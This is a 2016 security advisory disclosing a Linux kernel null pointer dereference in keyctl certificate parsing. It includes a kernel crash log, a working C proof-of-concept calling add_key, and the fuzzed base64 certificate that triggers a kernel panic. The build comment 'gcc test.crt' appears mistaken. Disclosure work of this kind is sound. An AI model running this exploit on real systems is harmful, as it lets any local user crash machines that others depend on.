Linux Kernel Keyctl Null Pointer Dereference
Posted on 15 November 2016
OS-S Security Advisory 2016-21 Local DoS: Linux Kernel Nullpointer Dereference via keyctl Date: October 31th, 2016 Authors: Sergej Schumilo, Ralf Spenneberg, Hendrik Schwartke CVE: Not yet assigned CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C) Severity: Potentially critical. If the kernel is compiled with the option aPanic-On-Oopsa, this vulnerability may lead to a kernel panic. Ease of Exploitation: Trivial Vulnerability Type: Local unprivileged kernel nullpointer dereference Abstract: A malicious interaction with the keyctl usermode interface allows an attacker to crash the kernel. Processing the attached certificate by the kernel leads to a kernel nullpointer dereference. This vulnerably can be triggered by any unprivileged user locally. Detailed product description: We have verified the bug on the following kernel builds: Ubuntu Server 16.10 (GNU/Linux 4.8.0-22-generic x86_64) RedHat Kernel 3.10.0-327.18.2.el7.x86_64 Vendor Communication: We contacted RedHat on June, 06th 2016. To this day, no security patch was provided by the vendor. We publish this Security Advisory in accordance with our responsible disclosure policy. Reference: https://bugzilla.redhat.com/show_bug.cgi?id=1343162 Proof of Concept: As a proof of concept, we are providing a sample exploit program and the associated certificate. Severity and Ease of Exploitation: The vulnerability can be easily exploited by an unprivileged user using our proof of concept. dmesg-Report: [ 40.067569] BUG: unable to handle kernel NULL pointer dereference at (null) [ 40.068251] IP: [<ffffffff81341911>] mpi_powm+0x31/0x9b0 [ 40.068710] PGD c853067 PUD 186bd067 PMD 0 [ 40.069090] Oops: 0002 [#1] KASAN [ 40.069384] Modules linked in: kafl_vuln_test(OE) ext4(OE) mbcache(OE) jbd2(OE) [ 40.070043] CPU: 0 PID: 143 Comm: guest_interface Tainted: G OE 4.4.0 #158 [ 40.070666] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 [ 40.071533] task: ffff88001864b100 ti: ffff88000c880000 task.ti: ffff88000c880000 [ 40.072117] RIP: 0010:[<ffffffff81341911>] [<ffffffff81341911>] mpi_powm+0x31/0x9b0 [ 40.072743] RSP: 0018:ffff88000c887bf0 EFLAGS: 00010246 [ 40.073165] RAX: 0000000000000020 RBX: 0000000000000020 RCX: ffff8800186b33f0 [ 40.073727] RDX: ffff8800186b3930 RSI: ffff8800186b32a0 RDI: ffff8800186b37e0 [ 40.074481] RBP: ffff88000c887cc0 R08: ffff880010000c00 R09: ffffed00030d6700 [ 40.075049] R10: ffffea000061ace0 R11: ffff880010000c08 R12: 0000000000000000 [ 40.075616] R13: ffff8800186b37e0 R14: 0000000000000000 R15: ffff8800186b32a0 [ 40.076174] FS: 0000000000911880(0063) GS:ffffffff81c2f000(0000) knlGS:0000000000000000 [ 40.076815] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b [ 40.077266] CR2: 0000000000000000 CR3: 000000000c817000 CR4: 00000000000006f0 [ 40.077850] Stack: [ 40.078018] 0000000000000001 ffffea0000321000 0000000000000000 ffff8800100026c0 [ 40.078646] ffffffff8118dff6 ffff8800186b37ff ffffffff8118dff6 ffff8800186b37ff [ 40.079286] 1ffff100030d6700 ffff88000c887c58 ffffffff8118e06e ffff8800185c95f8 [ 40.079925] Call Trace: [ 40.080129] [<ffffffff8118dff6>] ? kasan_unpoison_shadow+0x36/0x50 [ 40.080642] [<ffffffff8118dff6>] ? kasan_unpoison_shadow+0x36/0x50 [ 40.081139] [<ffffffff8118e06e>] ? kasan_kmalloc+0x5e/0x70 [ 40.081582] [<ffffffff81342320>] ? mpi_alloc+0x20/0x80 [ 40.082006] [<ffffffff812cee6c>] ? RSA_verify_signature+0x36c/0xf60 [ 40.082512] [<ffffffff812ceec5>] RSA_verify_signature+0x3c5/0xf60 [ 40.083001] [<ffffffff812ceb00>] ? public_key_describe+0x160/0x160 [ 40.083507] [<ffffffff812ce5c5>] public_key_verify_signature+0x785/0xb20 [ 40.084043] [<ffffffff812d5bad>] x509_check_signature+0x9d/0x320 [ 40.084531] [<ffffffff812d6461>] x509_key_preparse+0x631/0x1210 [ 40.085014] [<ffffffff812cbe1a>] ? asymmetric_key_preparse+0x26a/0x530 [ 40.085534] [<ffffffff812cbce7>] asymmetric_key_preparse+0x137/0x530 [ 40.086981] [<ffffffff8126b8fb>] ? key_type_lookup+0x4b/0x80 [ 40.087437] [<ffffffff8126ba67>] key_create_or_update+0x137/0x450 [ 40.087942] [<ffffffff8126d2e7>] SyS_add_key+0x117/0x200 [ 40.088381] [<ffffffff81741d33>] entry_SYSCALL_64_fastpath+0x16/0x75 [ 40.088890] Code: 41 56 41 55 41 54 53 48 81 ec a8 00 00 00 8b 41 04 44 8b 72 04 4c 8b 67 18 85 c0 89 45 a4 0f 84 da 07 00 00 45 85 f6 75 38 89 c3 <49> c7 04 24 01 00 00 00 b8 01 00 00 00 83 fb 01 0f 84 84 01 00 [ 40.091203] RIP [<ffffffff81341911>] mpi_powm+0x31/0x9b0 [ 40.091645] RSP <ffff88000c887bf0> [ 40.091924] CR2: 0000000000000000 [ 40.092207] ---[ end trace 3d4c5681d47247c7 ]--- [ 40.092566] Kernel panic - not syncing: Fatal exception [ 40.092968] Kernel Offset: disabled [ 40.093242] Rebooting in 1 seconds.. Proof of Concept (Code): /* * * base64 -d < certificate.base64 > test.crt * gcc test.crt -lkeyutils * ./a.out * */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <stdint.h> #include <fcntl.h> #include <sys/mman.h> #include <string.h> #include <sys/mount.h> #include <errno.h> #include <signal.h> #include <keyutils.h> int main(){ FILE *infile; char *buffer; long numbytes; key_serial_t key_id; key_serial_t keyring_id; infile = fopen("test.crt", "r"); if(infile == NULL) return 1; fseek(infile, 0L, SEEK_END); numbytes = ftell(infile); fseek(infile, 0L, SEEK_SET); buffer = (char*)calloc(numbytes, sizeof(char)); if(buffer == NULL) return 1; fread(buffer, sizeof(char), numbytes, infile); fclose(infile); /* inject fuzzed x509 DER data into asymmetric crypto kernel code */ key_id = add_key("asymmetric", "", buffer, numbytes, 0xfffffffd); printf("Oops?! "); if(key_id != -1){ keyctl_unlink(key_id, 0xfffffffd); } free(buffer); return 0; } Proof of Concept (Certificate): MIID/jCCAuagAwIBAgIQFaxulBmyeUtB9iepwxgPHzANBgkqhkiG9w0BAQsFADCBmDELMAkGA1UE BhMCVVMxFjAUBgNVBAoTDUdlb1RydXN0IEluYy4xOTA3BgNVBAsTMChjKSAyMDA4IEdlb1RydXN0 IEluYy4gLSBGb3IgYXV0aG9yaXplZCB1c2Ugb25seTE2MDQGA1UEAxMtR2VvVHJ1c3QgUHJpbWFy eSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eSAtIEczMB4XDTA4MDQwMjAwMDAwMFoXDTM3MTIwMTIz NTk1OVowgZgxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1HZW9UcnVzdCBJbmMuMTkwNwYDVQQLEzAo YykgMjAwOCBHZW9UcnVzdCBJbmMuIC0gRm9yIGF1dGhvcml6ZWQgdXNlIG9ubHkxNjA0BgNVBAMT LUdlb1RydXN0IFByaW1hcnkgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkgLSBHMzCCASIwDQYJKoZI hvcNAQEBBQADggEPADCCAQgCggEBANziXmJYHTNXOTIz+uvLh4yn1ErdBojqZI4xmKU4kB6Yzy5j K/BGvESyiaHAKAxJcCGVn2TAppMSAmUmhsalifD614SgcK9PGpc/BkTVyetyEH3kMSj7HGHmKAdE c5IiaacDiGydY8hS2pgn5whMcD60yRLBxWeDXTPzAxHsatBT4tG6NmCUgLthY2xbF37fQJQeqw3C IShwiP/WJmxsYAQlTlV+fe+/lEjetx3dcI0FX4ilm/LC7urRQEFtYjgdVgbFA0dRIBn8exALDmKu dlW/X3e+PkkBUz2YJQN2JFodtNuJ6nnltrM7P7pMKEF/BqxqjsHQ9gUdfeZChuOl1UcCAQAAAaNC MEAwDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwHQYDVR0OBBYEFMR5yo6hTgMdHNxr 2zFblD4/MH8tMA0GCSqGSIb3DQEBCwUAA4IBAQAtxRPPVoB7eni9n64smefv2t+UXglpp+duaIy9 cr5HqQ6XErhK8WTTOd8lNNTBzU6B8A8ExCSzNJbGpqow32hhc9f5joWJ7w5elShKKiePEI4ufIbE Ap7aDHdlDkQNkv39sxY2+hENHYwOB4lqKVb3cvTdFZx3NWZXqxNT2I7BQMXXExZacse3aQHEerGD AWh9jUGhlBjBJVz88P6DAod8DQ3PLghcSkANPuyBYeYk28rgDi0Hsj5W3I31QYUHSJsMC8tJP33s t/3LjWeJGqvtux6jAAgIFyqCXDFdRootD4abdNlF+9RAsXqqaC2Gspki4cErx5z481+oghLrGREt -- OpenSource Training Ralf Spenneberg http://www.os-t.de Am Bahnhof 3-5 48565 Steinfurt Germany Fon: +49(0)2552 638 755 Fax: +49(0)2552 638 757